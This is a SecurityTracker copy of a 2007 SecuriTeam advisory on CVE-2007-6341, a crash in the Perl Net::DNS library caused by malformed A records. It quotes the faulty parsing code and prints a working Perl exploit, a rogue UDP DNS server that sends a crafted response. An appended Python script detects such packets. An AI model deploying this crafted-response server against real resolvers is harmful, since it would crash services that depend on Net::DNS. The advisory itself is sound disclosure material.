SecurityTracker.com
SecurityTracker
Archives







Category:  Application (Generic)  >  Net DNS
Vendors:  net-dns.org
Net::DNS Bug in Processing DNS Response Packets Lets Remote Users Deny Service
SecurityTracker Alert ID:  1019104
SecurityTracker URL:  http://securitytracker.com/id?1019104
CVE Reference:  CVE-2007-6341
Date:  Dec 17 2007
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): 0.60 build 654; possibly other versions
Description:  A vulnerability was reported in Net::DNS. A remote user can cause denial of service conditions.

A remote user can send a specially crafted DNS response to potentially cause the target service to crash.

The vulnerability resides in 'Net/DNS/RR/A.pm'.

The vendor was notified on October 28, 2007.

Beyond Security reported this vulnerability, detected by beSTORM.

Impact:  A remote user can cause an application using Net::DNS to crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.net-dns.org/
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  SecuriTeam <support@securiteam.com>
Message History:   None.


 Source Message Contents

Date:  16 Dec 2007 11:30:56 +0200
From:  SecuriTeam <support@securiteam.com>
Subject:  [UNIX] Net::DNS Malformed Packet DoS

 
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Net::DNS Malformed Packet DoS
------------------------------------------------------------------------

SUMMARY

<http://www.net-dns.org/> Net::DNS is "a DNS resolver implemented in Perl. It allows the programmer to perform nearly any type of DNS query from a Perl script". beSTORM's DNS Server module has been able to detect a vulnerability in Net::DNS that allows a malicious server to cause the Net::DNS package to crash by sending it a malformed DNS response; this in turn would cause any product using the package to crash with it.

DETAILS

Vulnerable Systems:
 * Net::DNS version 0.60 build 654

It is possible to cause Net::DNS to "croak" by responding to it with a malformed DNS response. The croak itself doesn't allow you to overflow or execute arbitrary code, but as it cannot be captured using normal Perl code - as with an eval() function for example - a user of the Net::DNS package can be caused to "crash", his program to forcefully terminate if it encounters this DNS response.

The problem stems from the fact that:

    if ($self->{"rdlength"} > 0) {
        $self->{"address"} = inet_ntoa(substr($$data, $offset, 4));

found in Net/DNS/RR/A.pm, doesn't properly verify that $$data has 4 bytes to read before attempting to substr - which in turn causes the data sent to inet_ntoa to not have enough bytes, which causes this code:

    ip_address = SvPVbyte(ip_address_sv, addrlen);
    if (addrlen == sizeof(addr) || addrlen == 4)
        addr.s_addr =
            (ip_address[0] & 0xFF) << 24 |
            (ip_address[1] & 0xFF) << 16 |
            (ip_address[2] & 0xFF) <<  8 |
            (ip_address[3] & 0xFF);
    else
        croak("Bad arg length for %s, length is %d, should be %d",
              "Socket::inet_ntoa",
              addrlen, sizeof(addr));

to issue a "croak" - causing the perl to abort.

Severity:
The vulnerability itself doesn't pose any problem as Socket::inet_ntoa handles it as expected; seriousness of this vulnerability is caused by the fact that several other packages such as SpamAssassin and OTRS rely on Net::DNS for resolving hostnames - this could at the very least be a nuisance where an attacker can crash the daemons run by these two programs.

Vendor status:
We have reported this issue to Net::DNS 6 weeks ago: <https://rt.cpan.org/Public/Bug/Display.html?id=30316> Security issue with Net::DNS::Resolver, but no response has been received.

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6341> CVE-2007-6341

Exploit:

    #!/usr/bin/perl
    # Beyond Security(c)
    # Vulnerability found by beSTORM - DNS Server module

    use strict;
    use IO::Socket;

    my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
    $MAXLEN = 1024;
    $PORTNO = 5351;
    $sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp')
        or die "socket: $@";
    print "Awaiting UDP messages on port $PORTNO\n";

    my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
    "\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
    "\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
    "\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
    "\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
    "\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
    "\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
    "\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
    "\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
    "\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
    "\x00\x01\x00\x00\x00\x01\x00\x01\x41";

    while ($sock->recv($newmsg, $MAXLEN)) {
        my($port, $ipaddr) = sockaddr_in($sock->peername);
        $hishost = gethostbyaddr($ipaddr, AF_INET);
        print "Client $hishost said ``$newmsg''\n";
        $sock->send($oldmsg);
        $oldmsg = "[$hishost] $newmsg";
    }
    die "recv: $!";

ADDITIONAL INFORMATION

The information has been provided by beSTORM.
The original article can be found at: <http://www.beyondsecurity.com/bestorm_overview.html>
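
The length check that the message above says is missing before inet_ntoa, turned into a triage script: this is an added example, not part of the advisory or of Net::DNS. It walks every resource record in a raw DNS response and reports A records whose RDLENGTH is not 4 or whose RDATA runs past the end of the packet. The function names and the two sample packets are constructed for illustration.

```python
import struct

TYPE_A = 1  # RR type A (IPv4 address): RDATA must be exactly 4 bytes

def skip_name(pkt, off):
    """Return the offset just past a (possibly compressed) DNS name."""
    while True:
        if off >= len(pkt):
            raise ValueError("name runs past end of packet")
        length = pkt[off]
        if length == 0:                  # root label terminates the name
            return off + 1
        if length & 0xC0 == 0xC0:        # compression pointer: 2 bytes, ends the name
            if off + 2 > len(pkt):
                raise ValueError("truncated compression pointer")
            return off + 2
        off += 1 + length                # ordinary label: length byte + label bytes

def check_response(pkt):
    """Return findings for A records whose RDATA is not 4 usable bytes."""
    if len(pkt) < 12:
        return ["packet shorter than 12-byte DNS header"]
    _id, _flags, qd, an, ns, ar = struct.unpack("!6H", pkt[:12])
    findings, off = [], 12
    try:
        for _ in range(qd):              # questions: name + type + class
            off = skip_name(pkt, off) + 4
        for i in range(an + ns + ar):    # answer, authority and additional RRs
            off = skip_name(pkt, off)
            if off + 10 > len(pkt):
                raise ValueError("truncated RR header")
            rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10
            if rtype == TYPE_A and rdlen != 4:
                findings.append(f"RR {i}: A record with RDLENGTH {rdlen}, expected 4")
            if off + rdlen > len(pkt):
                findings.append(f"RR {i}: RDATA runs past end of packet")
                break
            off += rdlen
    except ValueError as exc:
        findings.append(f"malformed packet: {exc}")
    return findings

# Constructed samples: one answer RR for example.test (name compressed to offset 12).
HDR = struct.pack("!6H", 0x1234, 0x8180, 1, 1, 0, 0)
QUESTION = b"\x07example\x04test\x00" + struct.pack("!HH", 1, 1)
RR_FIXED = b"\xc0\x0c" + struct.pack("!HHI", TYPE_A, 1, 60)
GOOD = HDR + QUESTION + RR_FIXED + struct.pack("!H", 4) + bytes([192, 0, 2, 1])
BAD = HDR + QUESTION + RR_FIXED + struct.pack("!H", 1) + b"\x41"  # 1-byte A RDATA
```

An empty list from check_response means every A record in the response carries exactly four readable bytes; any finding marks a response that the parsing code quoted in the message would hand to inet_ntoa with the wrong length.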



Copyright 2007, SecurityGlobal.net LLC